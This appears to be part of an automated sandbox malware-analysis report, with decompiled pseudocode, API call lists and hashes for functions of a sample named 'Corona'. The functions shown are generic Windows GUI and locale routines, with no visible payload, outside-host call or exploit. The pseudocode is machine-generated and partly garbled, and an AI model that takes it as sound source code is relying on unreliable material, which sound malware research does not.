                                  				_t16 = __eax;
                                  				_t38 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x450c1c != 0) {
                                  					_t16 = E00435154(__eax);
                                  					if(_t16 != 0) {
                                  						_t41 = GetWindowLongA(E00434EF4(_t38), 0xffffffec);
                                  						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
                                  							if((_t41 & 0x00080000) == 0) {
                                  								SetWindowLongA(E00434EF4(_t38), 0xffffffec, _t41 | 0x00080000);
                                  							}
                                  							return  *0x450c1c(E00434EF4(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x00450CA0 |  *0x00450CA8);
                                  						} else {
                                  							SetWindowLongA(E00434EF4(_t38), 0xffffffec, _t41 & 0xfff7ffff);
                                  							_push(0x485);
                                  							_push(0);
                                  							_push(0);
                                  							_t37 = E00434EF4(_t38);
                                  							_push(_t37);
                                  							L0040659C();
                                  							return _t37;
                                  						}
                                  					}
                                  				}
                                  				return _t16;
                                  			}








                                  APIs
                                  • GetWindowLongA.USER32 ref: 0044AFB8
                                  • SetWindowLongA.USER32 ref: 0044AFEA
                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,00448B78), ref: 0044B024
                                  • SetWindowLongA.USER32 ref: 0044B03D
                                  • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00448B78), ref: 0044B053
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$Long$AttributesB330Layered
                                  • String ID:
                                  • API String ID: 1770052509-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 40%
                                  			E0041DD1C(intOrPtr __eax) {
                                  				char _v5;
                                  				intOrPtr _v12;
                                  				intOrPtr _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t21;
                                  				intOrPtr _t30;
                                  				void* _t32;
                                  				void* _t34;
                                  				intOrPtr _t35;
                                  
                                  				_t32 = _t34;
                                  				_t35 = _t34 + 0xfffffff8;
                                  				_v5 = 0;
                                  				if( *0x45288c == 0) {
                                  					return _v5;
                                  				} else {
                                  					_push(0);
                                  					L0040638C();
                                  					_v12 = __eax;
                                  					_push(_t32);
                                  					_push(0x41dda2);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t35;
                                  					_push(0x68);
                                  					_t14 = _v12;
                                  					_push(_t14);
                                  					L004060D4();
                                  					if(_t14 >= 0x10) {
                                  						_push(__eax + 4);
                                  						_push(8);
                                  						_push(0);
                                  						_t18 =  *0x45288c; // 0xa8080a0b
                                  						_push(_t18);
                                  						L004060FC();
                                  						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                                  						_push(8);
                                  						_push(8);
                                  						_t21 =  *0x45288c; // 0xa8080a0b
                                  						_push(_t21);
                                  						L004060FC();
                                  						_v5 = 1;
                                  					}
                                  					_pop(_t30);
                                  					 *[fs:eax] = _t30;
                                  					_push(0x41dda9);
                                  					_t16 = _v12;
                                  					_push(_t16);
                                  					_push(0);
                                  					L004065C4();
                                  					return _t16;
                                  				}
                                  			}














                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041DD34
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041DDA2,?,00000000), ref: 0041DD50
                                  • 72E7AEA0.GDI32(A8080A0B,00000000,00000008,?,?,00000068,00000000,0041DDA2,?,00000000), ref: 0041DD68
                                  • 72E7AEA0.GDI32(A8080A0B,00000008,00000008,?,A8080A0B,00000000,00000008,?,?,00000068,00000000,0041DDA2,?,00000000), ref: 0041DD80
                                  • 72E7B380.USER32(00000000,?,0041DDA9,0041DDA2,?,00000000), ref: 0041DD9C
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0040AC84(void* __esi, void* __eflags) {
                                  				char _v8;
                                  				intOrPtr* _t18;
                                  				intOrPtr _t26;
                                  				void* _t27;
                                  				long _t29;
                                  				intOrPtr _t32;
                                  				void* _t33;
                                  
                                  				_t33 = __eflags;
                                  				_push(0);
                                  				_push(_t32);
                                  				_push(0x40ad1b);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t32;
                                  				E0040A9FC(GetThreadLocale(), 0x40ad30, 0x100b,  &_v8);
                                  				_t29 = E00407DB8(0x40ad30, 1, _t33);
                                  				if(_t29 + 0xfffffffd - 3 < 0) {
                                  					EnumCalendarInfoA(E0040ABD0, GetThreadLocale(), _t29, 4);
                                  					_t27 = 7;
                                  					_t18 = 0x45276c;
                                  					do {
                                  						 *_t18 = 0xffffffff;
                                  						_t18 = _t18 + 4;
                                  						_t27 = _t27 - 1;
                                  					} while (_t27 != 0);
                                  					EnumCalendarInfoA(E0040AC0C, GetThreadLocale(), _t29, 3);
                                  				}
                                  				_pop(_t26);
                                  				 *[fs:eax] = _t26;
                                  				_push(E0040AD22);
                                  				return E00403E4C( &_v8);
                                  			}











                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040AD1B,?,?,00000000), ref: 0040AC9C
                                    • Part of subcall function 0040A9FC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AA1A
                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040AD1B,?,?,00000000), ref: 0040ACCC
                                  • EnumCalendarInfoA.KERNEL32(Function_0000ABD0,00000000,00000000,00000004), ref: 0040ACD7
                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040AD1B,?,?,00000000), ref: 0040ACF5
                                  • EnumCalendarInfoA.KERNEL32(Function_0000AC0C,00000000,00000000,00000003), ref: 0040AD00
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread$CalendarEnum
                                  • String ID:
                                  • API String ID: 4102113445-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044C5B4() {
                                  				void* _t2;
                                  				void* _t5;
                                  				void* _t8;
                                  				struct HHOOK__* _t10;
                                  
                                  				if( *0x452bc8 != 0) {
                                  					_t10 =  *0x452bc8; // 0x0
                                  					UnhookWindowsHookEx(_t10);
                                  				}
                                  				 *0x452bc8 = 0;
                                  				if( *0x452bcc != 0) {
                                  					_t2 =  *0x452bc4; // 0x0
                                  					SetEvent(_t2);
                                  					if(GetCurrentThreadId() !=  *0x452bc0) {
                                  						_t8 =  *0x452bcc; // 0x0
                                  						WaitForSingleObject(_t8, 0xffffffff);
                                  					}
                                  					_t5 =  *0x452bcc; // 0x0
                                  					CloseHandle(_t5);
                                  					 *0x452bcc = 0;
                                  					return 0;
                                  				}
                                  				return 0;
                                  			}








                                  APIs
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 0044C5C3
                                  • SetEvent.KERNEL32(00000000,0044E932,00000000,0044D9DF,?,?,0044F588,00000001,0044DA9F,?,?,?,0044F588), ref: 0044C5DE
                                  • GetCurrentThreadId.KERNEL32 ref: 0044C5E3
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0044E932,00000000,0044D9DF,?,?,0044F588,00000001,0044DA9F,?,?,?,0044F588), ref: 0044C5F8
                                  • CloseHandle.KERNEL32(00000000,00000000,0044E932,00000000,0044D9DF,?,?,0044F588,00000001,0044DA9F,?,?,?,0044F588), ref: 0044C603
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                  • String ID:
                                  • API String ID: 2429646606-0
                                  • Opcode ID: e2381fa4031b83fdd8dc8bfe1b6ff9b4b78a7dd2d095956982b4b88e19e70640
                                  • Instruction ID: 8e8d116a209ff229685a45bfd69fd15fb1fd99825208448899296e255fd875e9
                                  • Opcode Fuzzy Hash: e2381fa4031b83fdd8dc8bfe1b6ff9b4b78a7dd2d095956982b4b88e19e70640
                                  • Instruction Fuzzy Hash: FAF09E715007039AD755EF65DD89A1A3394A706316B14493BF024F71E2C6BCF440CF2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00439174(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
                                  				intOrPtr* _v8;
                                  				struct tagPOINT _v16;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				struct tagMSG _v64;
                                  				intOrPtr _v68;
                                  				long _v72;
                                  				char _v76;
                                  				intOrPtr _t125;
                                  				int _t126;
                                  				int _t140;
                                  				int _t147;
                                  				intOrPtr* _t175;
                                  				int _t186;
                                  				void* _t191;
                                  				intOrPtr* _t209;
                                  				void* _t213;
                                  				intOrPtr _t214;
                                  				intOrPtr _t219;
                                  				int _t232;
                                  				intOrPtr _t233;
                                  				int _t236;
                                  				intOrPtr* _t242;
                                  				intOrPtr _t262;
                                  				intOrPtr _t278;
                                  				intOrPtr _t289;
                                  				int _t297;
                                  				int _t300;
                                  				int _t302;
                                  				int _t303;
                                  				int _t304;
                                  				void* _t307;
                                  				void* _t309;
                                  				void* _t315;
                                  
                                  				_t315 = __fp0;
                                  				_t306 = _t307;
                                  				_v76 = 0;
                                  				_t242 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t307);
                                  				_push(0x43954c);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t307 + 0xffffffb8;
                                  				_t125 =  *__edx;
                                  				_t309 = _t125 - 0x202;
                                  				if(_t309 > 0) {
                                  					_t126 = _t125 - 0x203;
                                  					__eflags = _t126;
                                  					if(__eflags == 0) {
                                  						E00406760( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
                                  						_t297 = E00437C04(_v8,  &_v20,  &_v72, __eflags);
                                  						__eflags = _t297;
                                  						if(_t297 != 0) {
                                  							__eflags =  *(_t297 + 4);
                                  							if( *(_t297 + 4) != 0) {
                                  								__eflags = _v20 - 2;
                                  								if(_v20 == 2) {
                                  									E0042D054();
                                  									E0042F4D8( *(_t297 + 4), 0, 0, 1);
                                  								}
                                  							}
                                  						}
                                  						L47:
                                  						if( *((short*)(_v8 + 0x32)) != 0) {
                                  							 *((intOrPtr*)(_v8 + 0x30))();
                                  						}
                                  						L49:
                                  						_pop(_t262);
                                  						 *[fs:eax] = _t262;
                                  						_push(0x439553);
                                  						return E00403E4C( &_v76);
                                  					}
                                  					_t140 = _t126 - 0xae2d;
                                  					__eflags = _t140;
                                  					if(_t140 == 0) {
                                  						 *((intOrPtr*)(_v8 + 0x30))();
                                  						__eflags =  *(__edx + 0xc);
                                  						if( *(__edx + 0xc) != 0) {
                                  							goto L49;
                                  						}
                                  						_t300 =  *((intOrPtr*)( *_v8 + 4))();
                                  						__eflags = _v20 - 0x12;
                                  						if(_v20 != 0x12) {
                                  							__eflags = _t300;
                                  							if(_t300 == 0) {
                                  								goto L49;
                                  							}
                                  							_t147 = _v20 - 2;
                                  							__eflags = _t147;
                                  							if(_t147 == 0) {
                                  								L46:
                                  								E0042E194(_t300,  &_v36);
                                  								 *((intOrPtr*)( *_v8))();
                                  								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
                                  								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
                                  								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
                                  								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
                                  								E0042E7E4(_t300,  &_v76);
                                  								E00403EA0( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								asm("movsd");
                                  								goto L49;
                                  							}
                                  							__eflags = _t147 != 0x12;
                                  							if(_t147 != 0x12) {
                                  								goto L49;
                                  							}
                                  							goto L46;
                                  						}
                                  						E00403E4C( *((intOrPtr*)(__edx + 8)) + 0x38);
                                  						goto L49;
                                  					} else {
                                  						__eflags = _t140 == 0x12;
                                  						if(_t140 == 0x12) {
                                  							_t175 =  *((intOrPtr*)(__edx + 8));
                                  							__eflags =  *_t175 - 0xb00b;
                                  							if( *_t175 == 0xb00b) {
                                  								E0043905C(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)));
                                  							}
                                  						}
                                  						goto L47;
                                  					}
                                  				}
                                  				if(_t309 == 0) {
                                  					__eflags =  *(_v8 + 0x60);
                                  					if(__eflags != 0) {
                                  						E00438BA8(_v8, __eflags);
                                  					} else {
                                  						E00406760( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                  						_t302 = E00437C04(_v8,  &_v20,  &_v16, __eflags);
                                  						__eflags = _t302;
                                  						if(_t302 != 0) {
                                  							__eflags = _v20 - 0x14;
                                  							if(_v20 == 0x14) {
                                  								_t295 =  *((intOrPtr*)(_t302 + 4));
                                  								_t278 =  *0x4436a0; // 0x4436ec
                                  								_t186 = E00403288( *((intOrPtr*)(_t302 + 4)), _t278);
                                  								__eflags = _t186;
                                  								if(_t186 == 0) {
                                  									E0042E704(_t295, 0);
                                  								} else {
                                  									E0044A5E8(_t295,  &_v20);
                                  								}
                                  							}
                                  						}
                                  					}
                                  					goto L47;
                                  				}
                                  				_t191 = _t125 - 0x20;
                                  				if(_t191 == 0) {
                                  					GetCursorPos( &_v16);
                                  					E0042E338( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
                                  					_v16.x = _v72;
                                  					_v16.y = _v68;
                                  					__eflags =  *((short*)(_t242 + 8)) - 1;
                                  					if( *((short*)(_t242 + 8)) != 1) {
                                  						goto L47;
                                  					}
                                  					__eflags = E00434EF4( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
                                  					if(__eflags != 0) {
                                  						goto L47;
                                  					}
                                  					__eflags = E00433A24( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
                                  					if(__eflags <= 0) {
                                  						goto L47;
                                  					}
                                  					_t303 = E00437C04(_v8,  &_v20,  &_v16, __eflags);
                                  					__eflags = _t303;
                                  					if(_t303 == 0) {
                                  						goto L47;
                                  					}
                                  					__eflags = _v20 - 0x12;
                                  					if(_v20 != 0x12) {
                                  						goto L47;
                                  					}
                                  					_t209 =  *0x451104; // 0x452bb4
                                  					SetCursor(E0044BCE8( *_t209,  *((short*)(0x450af8 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
                                  					 *((intOrPtr*)(_t242 + 0xc)) = 1;
                                  					goto L49;
                                  				}
                                  				_t213 = _t191 - 0x1e0;
                                  				if(_t213 == 0) {
                                  					_t214 = _v8;
                                  					__eflags =  *(_t214 + 0x60);
                                  					if( *(_t214 + 0x60) != 0) {
                                  						E00438C5C(_v8);
                                  						E00406760( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
                                  						_t219 = _v8;
                                  						 *(_t219 + 0x50) = _v72;
                                  						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
                                  						E004390E4(_t306);
                                  						E00438C5C(_v8);
                                  					}
                                  					goto L47;
                                  				}
                                  				if(_t213 == 1) {
                                  					E00406760( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                  					_t256 =  &_v20;
                                  					_t304 = E00437C04(_v8,  &_v20,  &_v16, __eflags);
                                  					__eflags = _t304;
                                  					if(_t304 == 0) {
                                  						goto L47;
                                  					}
                                  					__eflags = _v20 - 0x12;
                                  					if(__eflags != 0) {
                                  						__eflags = _v20 - 2;
                                  						if(_v20 != 2) {
                                  							goto L47;
                                  						}
                                  						_t232 = PeekMessageA( &_v64, E00434EF4( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
                                  						__eflags = _t232;
                                  						if(_t232 == 0) {
                                  							_t289 =  *0x42abf0; // 0x42ac3c
                                  							_t236 = E00403288( *((intOrPtr*)(_t304 + 4)), _t289);
                                  							__eflags = _t236;
                                  							if(_t236 != 0) {
                                  								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
                                  							}
                                  						}
                                  						_t233 =  *((intOrPtr*)(_t304 + 4));
                                  						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
                                  						if( *((char*)(_t233 + 0x9b)) == 1) {
                                  							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
                                  							if( *((char*)(_t233 + 0x5d)) == 1) {
                                  								E0042EE80(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
                                  							}
                                  						}
                                  						goto L49;
                                  					}
                                  					E00438B48(_v8,  &_v16, _t304, __eflags);
                                  				} else {
                                  				}
                                  			}

                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004393B4
                                  • SetCursor.USER32(00000000,?,00000000,0043954C), ref: 00439446
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Cursor
                                  • String ID: 6D
                                  • API String ID: 3268636600-480018528
                                  • Opcode ID: ee9d473c8e3c4813df8d52c0cdfd67e3f8d59963d1fc248462995df78abf26a4
                                  • Instruction ID: 2632150d836bcf531531a7b503c8239585164110d7f8166e3685c7fb5193565f
                                  • Opcode Fuzzy Hash: ee9d473c8e3c4813df8d52c0cdfd67e3f8d59963d1fc248462995df78abf26a4
                                  • Instruction Fuzzy Hash: 23C18031A00219DFCB15EFA9C58599FB7F1BF08304F5455AAE801AB355D7B8EE81CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0044EBAC(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				int _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				struct tagPOINT _v32;
                                  				char _v33;
                                  				intOrPtr _v40;
                                  				char _v44;
                                  				intOrPtr _v48;
                                  				struct HWND__* _v52;
                                  				intOrPtr _v56;
                                  				char _v60;
                                  				struct tagRECT _v76;
                                  				intOrPtr _v80;
                                  				intOrPtr _v84;
                                  				int _v88;
                                  				int _v92;
                                  				intOrPtr _v96;
                                  				char _v100;
                                  				struct tagRECT _v116;
                                  				char _v132;
                                  				intOrPtr _v136;
                                  				char _v140;
                                  				char _v144;
                                  				char _v148;
                                  				struct HWND__* _t130;
                                  				struct HWND__* _t166;
                                  				intOrPtr _t188;
                                  				char _t194;
                                  				intOrPtr _t218;
                                  				intOrPtr _t222;
                                  				void* _t238;
                                  				intOrPtr* _t250;
                                  				intOrPtr _t270;
                                  				intOrPtr _t271;
                                  				intOrPtr _t273;
                                  				intOrPtr _t279;
                                  				intOrPtr* _t306;
                                  				intOrPtr _t307;
                                  				void* _t314;
                                  
                                  				_t313 = _t314;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_v144 = 0;
                                  				_v148 = 0;
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_v8 = __eax;
                                  				_t270 =  *0x444a2c; // 0x444a30
                                  				E004047B8( &_v100, _t270);
                                  				_t250 =  &_v8;
                                  				_push(_t314);
                                  				_push(0x44ef32);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t314 + 0xffffff70;
                                  				 *((char*)( *_t250 + 0x58)) = 0;
                                  				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E00444DE4() == 0 || E0044C42C(E0042D0A0( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
                                  					L23:
                                  					_t130 = _v52;
                                  					__eflags = _t130;
                                  					if(_t130 <= 0) {
                                  						E0044E914( *_t250);
                                  					} else {
                                  						E0044E71C( *_t250, 0, _t130);
                                  					}
                                  					goto L26;
                                  				} else {
                                  					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
                                  					_v92 = _v16;
                                  					_v88 = _v12;
                                  					_v88 = _v88 + E0044E94C();
                                  					_v84 = E0044B7F0();
                                  					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
                                  					E0042E194( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
                                  					_v32.x = 0;
                                  					_v32.y = 0;
                                  					_t306 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
                                  					_t320 = _t306;
                                  					if(_t306 == 0) {
                                  						_t307 =  *((intOrPtr*)( *_t250 + 0x60));
                                  						_t279 =  *0x42abf0; // 0x42ac3c
                                  						_t166 = E00403288(_t307, _t279);
                                  						__eflags = _t166;
                                  						if(_t166 != 0) {
                                  							__eflags =  *(_t307 + 0x190);
                                  							if( *(_t307 + 0x190) != 0) {
                                  								ClientToScreen( *(_t307 + 0x190),  &_v32);
                                  							}
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)( *_t306 + 0x40))();
                                  					}
                                  					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
                                  					E0042E338( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
                                  					_v60 = _v140;
                                  					_v56 = _v136;
                                  					E0044C3F4( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
                                  					E0042B914(_v148,  &_v140,  &_v144, _t320);
                                  					E00403EE4( &_v44, _v144);
                                  					_v52 = 0;
                                  					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
                                  					_t188 =  *0x450c18; // 0x42b294
                                  					_v96 = _t188;
                                  					_v40 = 0;
                                  					_v33 = E0042F98C( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
                                  					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
                                  						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
                                  					}
                                  					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
                                  						_t194 = 0;
                                  					} else {
                                  						_t194 = 1;
                                  					}
                                  					_t285 =  *_t250;
                                  					 *((char*)( *_t250 + 0x58)) = _t194;
                                  					if( *((char*)( *_t250 + 0x58)) == 0) {
                                  						goto L23;
                                  					} else {
                                  						_t327 = _v44;
                                  						if(_v44 == 0) {
                                  							goto L23;
                                  						}
                                  						E0044EAA0(_v96, _t285, _t313);
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
                                  						OffsetRect( &_v116, _v92, _v88);
                                  						if(E004032F8( *((intOrPtr*)( *_t250 + 0x84)), _t327) != 0) {
                                  							_t238 = E0044EB00(_v44, _t250, 0xffc8, _t313) + 5;
                                  							_v116.left = _v116.left - _t238;
                                  							_v116.right = _v116.right - _t238;
                                  						}
                                  						E0042E30C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
                                  						_t218 =  *_t250;
                                  						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
                                  						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
                                  						E0042E30C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
                                  						_t222 =  *_t250;
                                  						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
                                  						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
                                  						E0042E984( *((intOrPtr*)( *_t250 + 0x84)), _v80);
                                  						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
                                  						E0044C540(_v44);
                                  						_t231 = _v52;
                                  						if(_v52 <= 0) {
                                  							E0044E71C( *_t250, 1, _v48);
                                  						} else {
                                  							E0044E71C( *_t250, 0, _t231);
                                  						}
                                  						L26:
                                  						_pop(_t271);
                                  						 *[fs:eax] = _t271;
                                  						_push(0x44ef39);
                                  						E00403E70( &_v148, 2);
                                  						_t273 =  *0x444a2c; // 0x444a30
                                  						return E00404888( &_v100, _t273);
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 00444DE4: GetActiveWindow.USER32 ref: 00444DE7
                                    • Part of subcall function 00444DE4: GetCurrentThreadId.KERNEL32 ref: 00444DFC
                                    • Part of subcall function 00444DE4: 72E7AC10.USER32(00000000,00444DC4), ref: 00444E02
                                    • Part of subcall function 0044E94C: GetCursor.USER32(?), ref: 0044E967
                                    • Part of subcall function 0044E94C: GetIconInfo.USER32(00000000,?), ref: 0044E96D
                                  • ClientToScreen.USER32(?,?), ref: 0044ECD8
                                  • OffsetRect.USER32(?,?,?), ref: 0044ECEF
                                  • OffsetRect.USER32(?,?,?), ref: 0044EE1F
                                    • Part of subcall function 0044E71C: SetTimer.USER32(00000000,00000000,?,0044C44C), ref: 0044E736
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                  • String ID: 0JD
                                  • API String ID: 3022406661-2685214340
                                  • Opcode ID: d95c4774388ab0daf6f617a9a74d9c01cc3b7b2a8e59d8ab9bc4e7e5aee60bd6
                                  • Instruction ID: 14a0fe05bb4a6c9a4aa746b2be83ddc1411c586ffd3bc93be4c36b6e8a0b5743
                                  • Opcode Fuzzy Hash: d95c4774388ab0daf6f617a9a74d9c01cc3b7b2a8e59d8ab9bc4e7e5aee60bd6
